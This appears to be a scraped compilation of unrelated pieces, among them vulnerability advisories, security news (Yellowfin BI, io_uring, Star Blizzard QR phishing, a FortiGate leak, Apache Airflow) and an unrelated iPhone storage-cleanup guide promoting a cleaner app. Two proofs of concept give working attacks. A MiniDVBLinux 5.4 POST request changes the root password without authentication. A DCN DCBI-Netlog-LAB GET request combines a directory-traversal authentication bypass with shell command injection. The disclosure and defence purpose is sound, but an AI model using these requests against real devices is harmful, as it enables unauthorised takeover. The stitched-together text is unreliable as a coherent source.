MiniDVBLinux versions 5.4 and below root password changing proof of concept exploit.

    MiniDVBLinux 5.4 Change Root Password PoCVendor: MiniDVBLinuxProduct web page: https://www.minidvblinux.deAffected version: <=5.4Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simpleway to convert a standard PC into a Multi Media Centre based on theVideo Disk Recorder (VDR) by Klaus Schmidinger. Features of thisLinux based Digital Video Recorder: Watch TV, Timer controlledrecordings, Time Shift, DVD and MP3 Replay, Setup and configurationvia browser, and a lot more. MLD strives to be as small as possible,modular, simple. It supports numerous hardware platforms, like classicdesktops in 32/64bit and also various low power ARM systems.Desc: The application allows a remote attacker to change the rootpassword of the system without authentication (disabled by default)and verification of previously assigned credential. Command executionalso possible using several POST parameters.Tested on: MiniDVBLinux 5.4           BusyBox v1.25.1           Architecture: armhf, armhf-rpi2           GNU/Linux 4.19.127.203 (armv7l)           VideoDiskRecorder 2.4.6Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2022-5715Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5715.php24.09.2022--Default root password: mld500Change system password:-----------------------POST /?site=setup&section=System HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6Cache-Control: max-age=0Connection: keep-aliveContent-Length: 778Content-Type: application/x-www-form-urlencodedCookie: fadein=true; sessid=fb9b4f16b50c4d3016ef434c760799fc; PHPSESSID=jbqjvk5omsb6pbpas78ll57qnpmvb4st7fk3r7slq80ecrdsubebn31tptjhvfbaHost: ip:8008Origin: http://ip:8008Referer: http://ip:8008/?site=setup&section=SystemUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36sec-gpc: 1APT_UPGRADE_CHECK=1&APT_SYSTEM_ID=1&APT_PACKAGE_CLASS_command=%2Fetc%2Fsetup%2Fapt.sh+setclass&APT_PACKAGE_CLASS=stable&SYSTEM_NAME=MiniDVBLinux&SYSTEM_VERSION_command=%2Fetc%2Fsetup%2Fbase.sh+setversion&SYSTEM_VERSION=5.4&SYSTEM_PASSWORD_command=%2Fetc%2Fsetup%2Fbase.sh+setpassword&SYSTEM_PASSWORD=r00t&BUSYBOX_ACPI_command=%2Fetc%2Fsetup%2Fbusybox.sh+setAcpi&BUSYBOX_NTPD_command=%2Fetc%2Fsetup%2Fbusybox.sh+setNtpd&BUSYBOX_NTPD=1&LOG_LEVEL=1&SYSLOG_SIZE_command=%2Fetc%2Fsetup%2Finit.sh+setsyslog&SYSLOG_SIZE=&LANG_command=%2Fetc%2Fsetup%2Flocales.sh+setlang&LANG=en_GB.UTF-8&TIMEZONE_command=%2Fetc%2Fsetup%2Flocales.sh+settimezone&TIMEZONE=Europe%2FKumanovo&KEYMAP_command=%2Fetc%2Fsetup%2Flocales.sh+setkeymap&KEYMAP=de-latin1&action=save&params=&changed=SYSTEM_PASSWORD+Pretty post data:APT_UPGRADE_CHECK: 1APT_SYSTEM_ID: 1APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclassAPT_PACKAGE_CLASS: stableSYSTEM_NAME: MiniDVBLinuxSYSTEM_VERSION_command: /etc/setup/base.sh setversionSYSTEM_VERSION: 5.4SYSTEM_PASSWORD_command: /etc/setup/base.sh setpasswordSYSTEM_PASSWORD: r00tBUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpiBUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpdBUSYBOX_NTPD: 1LOG_LEVEL: 1SYSLOG_SIZE_command: /etc/setup/init.sh setsyslogSYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlangLANG: en_GB.UTF-8TIMEZONE_command: /etc/setup/locales.sh settimezoneTIMEZONE: Europe/KumanovoKEYMAP_command: /etc/setup/locales.sh setkeymapKEYMAP: de-latin1action: saveparams: changed: SYSTEM_PASSWORD Eenable webif password check:-----------------------------POST /?site=setup&section=System HTTP/1.1APT_UPGRADE_CHECK: 1APT_SYSTEM_ID: 1APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclassAPT_PACKAGE_CLASS: stableSYSTEM_NAME: MiniDVBLinuxSYSTEM_VERSION_command: /etc/setup/base.sh setversionSYSTEM_VERSION: 5.4SYSTEM_PASSWORD_command: /etc/setup/base.sh setpasswordSYSTEM_PASSWORD: BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpiBUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpdBUSYBOX_NTPD: 1LOG_LEVEL: 1SYSLOG_SIZE_command: /etc/setup/init.sh setsyslogSYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlangLANG: en_GB.UTF-8TIMEZONE_command: /etc/setup/locales.sh settimezoneTIMEZONE: Europe/BerlinKEYMAP_command: /etc/setup/locales.sh setkeymapKEYMAP: de-latin1WEBIF_PASSWORD_CHECK: 1action: saveparams: changed: WEBIF_PASSWORD_CHECK Disable webif password check:-----------------------------POST /?site=setup&section=System HTTP/1.1APT_UPGRADE_CHECK: 1APT_SYSTEM_ID: 1APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclassAPT_PACKAGE_CLASS: stableSYSTEM_NAME: MiniDVBLinuxSYSTEM_VERSION_command: /etc/setup/base.sh setversionSYSTEM_VERSION: 5.4SYSTEM_PASSWORD_command: /etc/setup/base.sh setpasswordSYSTEM_PASSWORD: BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpiBUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpdBUSYBOX_NTPD: 1LOG_LEVEL: 1SYSLOG_SIZE_command: /etc/setup/init.sh setsyslogSYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlangLANG: en_GB.UTF-8TIMEZONE_command: /etc/setup/locales.sh settimezoneTIMEZONE: Europe/BerlinKEYMAP_command: /etc/setup/locales.sh setkeymapKEYMAP: de-latin1action: saveparams: changed: WEBIF_PASSWORD_CHECK

MiniDVBLinux 5.4 Change Root Password

Pre- and post-auth path to pwnage

A trio of authentication bypass bugs stemming from the use of hardcoded keys have been patched in popular enterprise analytics platform Yellowfin BI.

After uncovering the pre-authentication vulnerabilities, security researchers from Assetnote then found a post-authentication path to command execution.

The flaws, which were discovered by Assetnote’s Max Garrett, have been assigned CVE numbers but not, as yet, CVSS scores.

**Bypasses**

The issues were discovered via instances of authentication logic as indicated by .

One authentication bypass (CVE-2022-47884) arose because contained “logic where allowed us to sign in as any user, as long as a signature check was passed”, according to a blog post published by Garrett and Assetnote CTO and co-founder Shubham Shah yesterday (January 24). The hardcoded private RSA key meant anyone could pass the signature check.

A second bypass, found in the JsAPI servlet, meant attackers could authenticate through the EXTAPI-IPID cookie, which was AES-encrypted using the hardcoded key’s user id (CVE-2022-47885).

“So it is possible for anyone who knows the victim’s user id to create a valid session as their account,” explained the blog post.

Read more of the latest enterprise security news

The third and final bypass (CVE-2022-47882) centered on Yellowfin’s suboptimal implementation of JWTs inside the REST API.

A valid refresh token id and extracted hardcoded key enabled the creation of a valid JWT as any user, although the impact was limited to privilege escalation given the need for a valid refresh token ID generated from a successful login.

Having performed an authentication bypass, a fourth bug – CVE-2022-47883 – then enabled attackers to perform remote code execution (RCE).

Noting Yellowfin BI’s connection to arbitrary data sources to pull data into the application, the researchers investigated whether JNDI or JDBC injections might enable command execution – and the JNDI mechanism, by using the gadget, duly proved fruitful.

Assetnote has published the full proof-of-concept exploit chain on GitHub.

The vulnerabilities have been patched in Yellowfin BI 9.8.1.

**Monolith application advice**

“In our assessment of enterprise applications, we often find hardcoded keys that lead to significant security impact (for example, our bug in VMWare AirWatch),” Shah told The Daily Swig. “Many enterprise products can be difficult to obtain due to qualification and sales processes. However once the source code has been obtained, there are often many critical vulnerabilities that can be exploited readily and easily.”

Yellowfin is a Java monolith application, and Shah and Garrett offered methodological advice to other security researchers hunting in similar codebases: “Map out the pre-authentication attack surface in as much detail as possible,” they said.

“Understand all of the routes, both static and dynamic, and then determine which portion of these routes are actually accessible without any authentication.”

After mapping pre-authentication routes, “determine how user input is processed by these routes and understand which routes take in what user input”, they continued. This will uncover issues warranting further investigation “simply based off the names of the controllers or parameters”.

YOU MIGHT ALSO LIKE AWS patches bypass bug in CloudTrail API monitoring tool

Yellowfin tackles auth bypass bug trio that opened door to RCE

An issue in the component /network_config/nsg_masq.cgi of DCN (Digital China Networks) DCBI-Netlog-LAB v1.0 allows attackers to bypass authentication and execute arbitrary commands via a crafted request.

**Information**

**Vendor of the products:**    Digital China Networks

**Vendor's website:**

https://www.dcnglobal.com (Global)

https://www.dcnetworks.com.cn (China)

**Reported by:**    WangJincheng(wjcwinmt@outlook.com)

**Affected products:** DCN (Digital China Networks) DCBI-Netlog-LAB

**Affected system version:** V1.0

**Product page:** https://www.dcnetworks.com.cn/goods/58.html

**Overview**

DCN (Digital China Networks) DCBI-Netlog-LAB is an online behavior log system. DCN (Digital China Networks) DCBI-Netlog-LAB V1.0 was detected with authentication bypass vulnerability and command injection vulnerability. An unauthenticated attacker can send crafted requests to bypass authentication through directory traversal, and inject arbitrary malicious commands into seven fields proto, ip, pport, p_dip, pdport, odev, and tport. Successful exploits could allow the attacker to execute arbitrary commands in remote systems.

**Vulnerability details**

The vulnerability was detected in the **/usr/local/lyx/lyxcenter/web/cgi-bin/network_config/nsg_masq.cgi** binary.

**Authentication bypass vulnerability**

In the sub_805534E function, user authentication is performed.

In the sub_8059C00 function, the __xstat function is used to check whether the /tmp/admincache/{user_name}/{session_id} path exists. If it does, the authentication check is passed.

The following figure shows the session value when the user name is admin.

Therefore, we can set user_name to admin and write ../ in session_id, points to the upper-layer directory, causing **directory traversal**. In this way, we can bypass this authentication, gain administrator privileges, and continue to exploit the following command injection vulnerability.

**Command injection vulnerability**

When the act field is 2 or 3, the sub_8049D50 function is called.

In the sub_8049D50 function, the contents of the proto, ip, pport, p_dip, pdport, odev, and tport fields are concatenated into the command string without any filtering.

Finally, whether the act field is 2 (that is, a1 is 1) or 3 (that is, a1 is 0), the popen function is called with the command string executed as an argument.

To sum up, an unauthenticated attacker can bypass authentication through directory traversal, and then make act 2 or 3, and inject arbitrary malicious commands into seven fields such as proto, thus gaining control of the remote systems.

**Poc**

For example, send the following message by the GET request.

    GET /cgi-bin/network_config/nsg_masq.cgi?user_name=admin&session_id=../&lang=zh_CN.UTF-8&act=2&proto=;ls>/usr/local/lyx/lyxcenter/web/hack_result.html; HTTP/1.1
    Host: 192.168.5.254
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    DNT: 1
    X-Forwarded-For: 8.8.8.8
    Connection: close
    

The above request message is just a demonstration. In addition, you can set act to 2 or 3 and inject arbitrary malicious commands into seven fields proto, ip, pport, p_dip, pdport, odev, and tport.

**Attack Demo**

Before the attack, no /hack_result.html page exists.

Follow the POC above to make the request.

After the attack, visit /hack_result.html again, you can see hack_result.html has been successfully created, and written to the results of the ls command to explain that the command ls>/usr/local/lyx/lyxcenter/web/hack_result.html we injected has been executed successfully.

CVE-2023-26802: my-vuls/DCN DCBI-Netlog-LAB at main · winmt/my-vuls

In the Linux kernel before 5.17.3, fs/io_uring.c has a use-after-free due to a race condition in io_uring timeouts. This can be triggered by a local user who has no access to any user namespace; however, the race condition perhaps can only be exploited infrequently.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[thread-next>\] \[day\] \[month\] \[year\] \[list\]

Date: Fri, 22 Apr 2022 02:43:27 +0200
From: David Bouman <dbouman03@...il.com>
To: oss-security@...ts.openwall.com
Subject: Linux: UaF due to concurrency issue in io\_uring timeouts

Hello list,

We (Jayden Rivers and David Bouman) are disclosing a bug we found in the 
Linux kernel's io\_uring subsystem. We have written a local privilege 
escalation PoC that can successfully elevate to system root from an 
unprivileged process (in a container). We will be releasing a blog post 
(including exploit code) in a week or two. It should be noted that 
unlike many Linux vulnerabilities that have surfaced recently, 
triggering this one does not require an attacker to have any kind of 
privileges (e.g. in a user namespace). This leaves many systems vulnerable.

We are still looking for a CNA representative that can assign a CVE 
number for this vulnerability; please contact us!

Kernel versions 5.10+ are affected, and linux-stable patches are already 
pushed. The upstream patch commit is 
e677edbcabee849bfdd43f1602bccbecf736a646 ("io\_uring: fix race between 
timeout flush and removal").

When the IORING\_OP\_TIMEOUT (T) and IORING\_OP\_LINK\_TIMEOUT (LT) opcodes 
are combined in a linked submission queue entry, and another request (B) 
finishes, a race might occur: namely, when due to the completion of B, T 
is cancelled (through the completion event count), and LT is canceled by 
its hrtimer at the same time. Whilst T is still being cleaned up, LT is 
already freed by a different execution context, and since they are 
linked, the cleanup of T retains a dangling reference to the now-freed 
LT. Hence, there's a use-after-free.

Exploitation-wise, the attacker can reallocate LT to another \`struct 
io\_kiocb\` and defer the UaF to e.g. a \`struct file\` (this is the 
technique we will describe in aforementioned blog post).

The race window is quite tight and the scenario is complicated, so the 
race can only be won very infrequently in our experience.

It is advised to upgrade your kernel to latest ASAP.

Greetings,

Jayden Rivers & David Bouman

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-29582: security - Linux: UaF due to concurrency issue in io_uring timeouts

A cybercriminal campaign linked to Russia is deploying QR codes to access the WhatsApp accounts of high-profile targets like journalists, members...

A cybercriminal campaign linked to Russia is deploying QR codes to access the WhatsApp accounts of high-profile targets like journalists, members of think tanks, and employees of non-governmental organizations (NGOs), according to new details revealed by Microsoft.

The group, which Microsoft tracks by the name “Star Blizzard,” is also referred to as Coldriver by other researchers. Last year, the group created impersonation accounts where members posed as experts in a field that their targets might be interested in—or that was somehow affiliated with the target. Once a relationship had been established, the target would receive a phishing link or a document that contained a phishing link.

But over time, that tactic became widely known, and part of the cybercriminals’ infrastructure was taken down. Now, it seems the group has changed tactics and is sending QR codes instead of malicious links to the targets that they have established an initial relationship with.

These QR codes do not take the target to a malicious website, nor will they join them to the promised WhatsApp group on “the latest non-governmental initiatives aimed at supporting Ukraine NGOs,” as is claimed in one of the cybercriminal lures.

In reality, the link in the QR code is intentionally broken. The idea is that the target will respond with a remark about the broken link. When that happens the cybercriminals send out a shortened URL to a website that displays another QR code.

_Screenshot courtesy of Microsoft_

> “I apologize for the inconvenience with the QR code. Kindly try this alternative link: US-Ukraine NGOs Group  
> It should work without any issues.

By scanning this QR code and following the instructions on the website they confirm the addition of an extra device to the WhatsApp account of the target. With that access the group can read the messages in their WhatsApp account and use existing browser plugins, particularly those designed for exporting WhatsApp messages from an account accessed via WhatsApp Web.

**How to stay safe**

These spear phishing campaigns are highly targeted and you’ll probably never see an invite to this group. But cybercriminals tend to copy ideas that work, so you may see them in another form.

There are a few simple rules that will help you avoid this kind of phishing.

*   Always hover over links before clicking them.
*   When you find a shortened URL, think about the possible reason for shortening. Was there a real need to do this or is it just meant to hide the destination?
*   When still in doubt, unshorten the URL.
*   When following instructions on a website, scrutinize whether the prompts on your device actually match the expected ones. WhatsApp will double-check whether you want to add a device to the account.
*   Double-check whether the sender is who they claim to be through another method of contact.

**We don’t just report on phone security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

 WhatsApp spear phishing campaign uses QR codes to add device 

FortiGate firewall leak exposes 15,000+ configurations, impacting organizations globally. The actor behind the leak is Belsen Group. Learn…

FortiGate firewall leak exposes 15,000+ configurations, impacting organizations globally. The actor behind the leak is Belsen Group. Learn how to mitigate risks and protect your systems.

A new leak from a threat actor group dubbed Belsen Group or (Belsen\_Group) has exposed configurations from over 15,000 **FortiGate firewalls**, threatening organizations that use these devices, as it could allow attackers to gain access to sensitive systems and bypass defences. The US, UK, Poland, and Belgium have the highest number of victims, followed by France, Spain, Malaysia, Netherlands, Thailand, and Saudi Arabia.

Research by CloudSEK’s contextual AI digital risk platform XVigil **reveals** that in 2022, the Belsen Group breached a zero-day vulnerability, leaking over 15,000 Fortigate firewall configurations. The leaked information includes usernames, passwords (some in plain text), device management digital certificates, and all firewall rules. This data gives attackers a treasure trove of information that they can exploit. 

Belsen Group on Breach Forums and its dark web leak site (Screenshot Hackread.com)

Exposed usernames and passwords, especially those in plain text, can be used by attackers to directly access sensitive systems on your network. Even if you patched the vulnerability (**CVE-2022-40684)** in 2022, it is crucial to check for signs of compromise since this was a zero-day exploit. Leaked firewall configurations reveal your internal network structure, potentially allowing attackers to identify weaknesses and bypass security measures.

Breached digital certificates could allow unauthorized access to devices or impersonation during secure communications. What’s even more concerning is that organizations that patched the vulnerability after the initial disclosure in 2022 might still be at risk if attackers gained access before the patch was applied.

****Belsen Group’s Motives and History****

While the Belsen Group appears to be new on the hacking forum scene, the leaked data suggests they’ve been around for at least three years. Researchers believe they were likely part of a group that exploited a zero-day vulnerability (CVE-2022-40684) in FortiGate firewalls in 2022. After potentially using or selling the access gained through the exploit, they’ve now resorted to leaking the data in 2025.

To mitigate risks arising from such leaks, it is essential to update all device and VPN credentials, especially those listed in the leaked data, and implement strong passwords. Audit and reconfigure firewalls to identify vulnerabilities and tighten access controls. Rotate compromised digital certificates to ensure secure communication.

Additionally, determine the timeline for patching CVE-2022-40684 in your organization, conduct forensic analysis on compromised devices, and monitor your network for unusual activity. These steps will help protect your network and reduce potential risks.

CloudSEK has created a useful resource for organizations to check if any network is part of the exposed IPs after analysing data, which is available **here**.

1.  **UNC5820 Exploits FortiManager Zero-Day Vulnerability**
2.  **CISA and Fortinet Warns of New FortiOS Zero-Day Flaws**
3.  **Hackers Exploiting 0-day Vulnerability in Fortinet Products**
4.  **Hackers leak login credentials of vulnerable Fortinet SSL VPNs**
5.  **Hackers dump login credentials of Fortinet VPN users in plain-text**

Belsen Group Leaks 15,000+ FortiGate Firewall Configurations

Apache Airflow, in versions prior to 2.7.0, contains a security vulnerability that can be exploited by an authenticated user possessing Connection edit privileges. This vulnerability allows the user to access connection information and exploit the test connection feature by sending many requests, leading to a denial of service (DoS) condition on the server. Furthermore, malicious actors can leverage this vulnerability to establish harmful connections with the server.

Users of Apache Airflow are strongly advised to upgrade to version 2.7.0 or newer to mitigate the risk associated with this vulnerability. Additionally, administrators are encouraged to review and adjust user permissions to restrict access to sensitive functionalities, reducing the attack surface.



**Conversation**

 pankajkoti changed the title Disable allowing by default testing of connnections in UI Disable allowing by default the testing of connections in UI, API and CLI

Jun 24, 2023

 pankajkoti changed the title Disable allowing by default the testing of connections in UI, API and CLI Disable default allowing the testing of connections in UI, API and CLI

Jun 24, 2023

Users can enable test connection functionaility in UI  with caution
by setting the \`enable\_test\_connection\` key to \`True\` in the
\`\[webserver\]\` section of airflow.cfg or by setting the environment
variable \`AIRFLOW\_\_WEBSERVER\_\_ENABLE\_TEST\_CONNECTION\` to \`True\`.

pankajkoti added a commit to astronomer/airflow that referenced this pull request

Aug 12, 2023

Following up PR apache#32052 the test connection is
disabled in UI, API and CLI. The API and CLI strictly check for the
config value to be set as \`Enabled\` for the functionality to be enabled,
whereas the UI just checks that is it not set to \`Disabled\`. As a result
setting values to the config param other than \`Disabled\`, enables the
button in the UI. Even though the button gets enabled, the API forbids
it as there is a strict check in the API that the value is set to
\`Enabled\` and only then allows, however, it makes sense to also strictly
check in the UI that value is set to \`Enabled\`.

hussein-awala pushed a commit that referenced this pull request

Aug 12, 2023

Following up PR #32052 the test connection is
disabled in UI, API and CLI. The API and CLI strictly check for the
config value to be set as \`Enabled\` for the functionality to be enabled,
whereas the UI just checks that is it not set to \`Disabled\`. As a result
setting values to the config param other than \`Disabled\`, enables the
button in the UI. Even though the button gets enabled, the API forbids
it as there is a strict check in the API that the value is set to
\`Enabled\` and only then allows, however, it makes sense to also strictly
check in the UI that value is set to \`Enabled\`.

ephraimbuddy pushed a commit that referenced this pull request

Aug 14, 2023

 

Following up PR #32052 the test connection is
disabled in UI, API and CLI. The API and CLI strictly check for the
config value to be set as \`Enabled\` for the functionality to be enabled,
whereas the UI just checks that is it not set to \`Disabled\`. As a result
setting values to the config param other than \`Disabled\`, enables the
button in the UI. Even though the button gets enabled, the API forbids
it as there is a strict check in the API that the value is set to
\`Enabled\` and only then allows, however, it makes sense to also strictly
check in the UI that value is set to \`Enabled\`.

(cherry picked from commit 50765eb)

ferruzzi pushed a commit to aws-mwaa/upstream-to-airflow that referenced this pull request

Aug 17, 2023

 

…3342)

Following up PR apache#32052 the test connection is
disabled in UI, API and CLI. The API and CLI strictly check for the
config value to be set as \`Enabled\` for the functionality to be enabled,
whereas the UI just checks that is it not set to \`Disabled\`. As a result
setting values to the config param other than \`Disabled\`, enables the
button in the UI. Even though the button gets enabled, the API forbids
it as there is a strict check in the API that the value is set to
\`Enabled\` and only then allows, however, it makes sense to also strictly
check in the UI that value is set to \`Enabled\`.

CVE-2023-37379: Disable default allowing the testing of connections in UI, API and CLI by pankajkoti · Pull Request #32052 · apache/airflow

An issue found in Agasio-Camera device version not specified allows a remote attacker to execute arbitrary code via the check and authLevel parameters.

CVE-2023-29862

Free up space on your iPhone fast. Learn 5 proven ways to clear storage, remove clutter, and manage photos, apps, and files with no gimmicks, just results.

If your iPhone feels cramped and storage alerts show up like it’s on a schedule, it’s probably time for a cleanup. Below, we’ll go over easy ways to quickly free up space on iPhone – and talk a bit about storage management in general. These aren’t gimmicks; they’re time-tested methods and tricks that work for anyone, whether you’re rocking an older iPhone or the latest model.

****How to Check What’s Eating Up Space****

The first thing on the checklist is to figure out what’s taking up all that space. Before you start deleting stuff blindly, open up Settings on your iPhone, tap General, and then hit iPhone Storage.

Give it a second to load – once it does, you’ll see a full breakdown: apps, photos, media, messages, system files, and that “Other” section that never quite explains itself. You can read what all those mean in the official iPhone guide – we won’t stop on this too long.

What matters right now is _where_ your space is going. If Photos is at the top? You’ll want to start there. If it’s giant apps like TikTok, Instagram, or games you haven’t touched in months – yep, those might be the real problem. You might even get some auto-suggestions right there in the menu, like “Offload Unused Apps” or “Review Large Attachments.” Take those seriously – they’re built into the system for a reason.

****How to Free Up Storage on iPhone****

Now, we’ll go through the most popular methods from the overall list of methods to free up space on an iPhone, step by step. We’ll start with Photos first, since for most people (and maybe for you), this is where storage goes to die.

****1\. Clean Up Your Photos****

You probably already know how to manually delete photos or videos from the Photos app. You just tap **_Select_**, choose what you don’t need, and hit the **trash icon**. Simple. But also… kinda miserable. That’s hours of scrolling and second-guessing.

So let’s skip the obvious and talk about faster ways to handle photo cleanup.

First, your iPhone actually has a Duplicates album baked into the Photos app. It can help you spot and merge exact photocopies – like when you AirDropped yourself the same shot twice or saved it from Messages. That can be useful… but there are a couple of catches.

1.  It only works with **exact** duplicates – so if the two photos look nearly identical but aren’t pixel-for-pixel twins, they won’t show up.
2.  It takes time. As a lot of folks pointed out on Reddit, your iPhone doesn’t flag duplicates instantly. You might have to wait a few hours (or days) for the indexing to finish before anything appears in that folder.
3.  Even when it _does_ work, it doesn’t always make a huge dent. A few exact copies here and there usually won’t free up gigabytes.

That’s why a lot of us end up turning to third-party tools that offer broader and faster ways to clean up photos. Special attention should go to AI-powered cleaners – these apps use actual machine learning to spot stuff your iPhone can’t. Not just copies, but _similar_ photos. Like ten shots of the same person blinking… and only one where their eyes are open.

One of the best apps we’ve used for this is Clever Cleaner: AI CleanUp App. It’s 100% free, smart, clean, and surprisingly good at figuring out what’s worth keeping.

**Here’s how to use it:**

1.  Download Clever Cleaner from the App Store.
2.  Open the app, go to Similars, and let it group your lookalike photos.
3.  Tap Smart Cleanup.
4.  The AI picks the best shots to keep. Like the selection? Slide to delete. Want to tweak it? Tap a group, pick a different best shot, or skip it.
5.  When you’re done, Hit Move to Trash, then Empty Trash to clear it all out.

It also flags Heavies (your largest files, sorted big to small – something the Photos app _can’t_ do), Screenshots (easy bulk delete), and Lives (lets you convert Live Photos to stills to save space).

After each cleanup, it shows how much space you saved – and reminds you to empty the Recently Deleted album to actually free up space on your iPhone.

****2\. Offload or Delete Unused Apps****

The next way to potentially clear _a lot_ of space on an iPhone is Apps. Especially the ones you haven’t opened in six months but somehow still take up 1.2 GB.

To find and quickly delete the biggest unused apps, do this:

1.  Open Settings.
2.  Tap General.
3.  Go to iPhone Storage.
4.  Wait for the list to load (apps are sorted by size, largest at the top).
5.  Tap any app you don’t use.

Next, you’ve got two options:

*   **Offload**. This deletes the app itself but keeps all your data. If you reinstall later, everything’s still there. Best for apps you _might_ use again.
*   **Delete**. This wipes the app and its data. Good for things you know you’re done with.

Pro tip: if you’re cool with iOS doing this automatically, turn on Offload Unused Apps in iPhone Storage. It silently trims unused apps when space runs low – and puts a little download icon on them so you can grab them back anytime.

****3\. Clear Safari Cache****

If you’ve been using Safari for a while – browsing, shopping, reading articles at 2 a.m. – there’s a good chance it’s been quietly stockpiling data in the background. Website history, cookies, cached images… it all adds up. You won’t see it in the Photos app or under “Media,” but it’s there.

It’s easy to clear it, and no, it _won’t_ delete your saved passwords or bookmarks. It’ll just wipe the behind-the-scenes junk.

**To do it:**

1.  Open Settings.
2.  Scroll down and tap Safari.
3.  Scroll again and tap Clear History and Website Data.
4.  Confirm when it asks.

That’s it. Safari gets a clean slate, and you get a bit more breathing room.

It’s also a good idea to clear the cache in other apps you use often. Safari isn’t the only one. Apps like Chrome, Firefox, Snapchat, WhatsApp, and most social media or browser apps all store cached data too. But, you won’t find those cache-clearing options in iPhone’s main Settings menu.

Each app handles it differently, usually tucked away in the app’s own settings. Some call it “Clear Cache,” others go with “Storage Management” or “Data Usage.” If you’re not sure where to look, check the app’s help guide or support page – there’s usually a quick step-by-step there.

And if you can’t find a clear option at all? Easy fix: delete and reinstall the app. It’s the fastest way to wipe the cache and start fresh. You’ll need to log back in, but you’d be surprised how much space that one move can save.

****4\. Delete Large Message Attachments****

Yes, all those photos, videos, voice notes, and memes you’ve sent and received over the years stay on your iPhone’s local storage. Every single one. Doesn’t matter if it’s from last week or three months ago – they’re still there.

Luckily, there’s a built-in way to review and clear this stuff (at least the biggest offenders) quickly. Here’s how to do it:

1.  Open Settings.
2.  Go to General > iPhone Storage.
3.  Scroll down and tap Messages.
4.  Under _Documents_, tap Review Large Attachments.
5.  You’ll see a list of the bulkiest files buried in your message threads.
6.  Tap Edit, select the ones you don’t need, and hit Delete.

That’s it. Quick and painless (and your conversations stay intact).

If you want to go even further, head to _Settings > Messages > Keep Messages_ and switch it to 30 Days. iOS will automatically toss older messages and their attachments without you lifting a finger.

If you don’t see Review Large Attachments, it means iOS didn’t flag anything big enough in the Messages app to show there – _or_ you simply haven’t accumulated much yet (good for you).

But that doesn’t mean you’re out of options.

You can still clear attachments manually within most messaging apps. Just like with cache, many apps have their own settings to manage storage and remove media files without deleting your entire chat history. This works for the built-in Messages app, and also for third-party apps like WhatsApp, Telegram, and others.

****5\. Remove Downloaded Files****

This one flies under the radar for a lot of people. You download a file – maybe a PDF, a video, a ZIP, or a random invoice – and forget all about it. But your iPhone doesn’t. It quietly saves that file in the **Files** app, or tucked inside whatever app you used to open it.

**Start with the Files app:**

1.  Open Files.
2.  Tap Browse at the bottom.
3.  Go to On My iPhone.
4.  Check folders like _Downloads_, _Documents_, or anything app-specific (Chrome, Acrobat, etc.)
5.  Long-press to delete anything you don’t need.

Then think about apps that save content offline. Netflix, Spotify, YouTube Premium, and even Podcasts – they all store downloaded files locally. You won’t see this storage in the Files app, but you can manage it inside each app’s settings. Look for things like Downloads, Offline Media, or Storage Usage. Some let you clear everything in one tap.

****Final Words****

These 5 methods to clear space on the iPhone we covered above are the same ones we’ve used countless times – and the ones we regularly recommend to others. They’re reliable, and efficient, and cover the main sources of clutter on nearly every device.

Some additional methods/features can help in specific cases:

*   You can activate Optimize iPhone Storage if you use iCloud, this keeps smaller, device-friendly versions of your photos and shifts the full-resolution ones to the cloud. It’s a simple toggle that can save a lot of space without deleting anything.

*   Voice Memos is another one to check. If you use the app often, long or forgotten recordings can quietly take up storage in the background. Clearing them out occasionally can free up more room than you’d expect.

But those are more situational. The five methods in our guide cover the must-dos. They work across devices, they’re easy to repeat, and they don’t require any technical know-how. A simple cleanup with these steps will give any iPhone more breathing room.

If you found these methods helpful, use the buttons below to share on Facebook or tweet it on X – someone else is probably dealing with the same storage headache right now.

How to Clear iPhone Storage

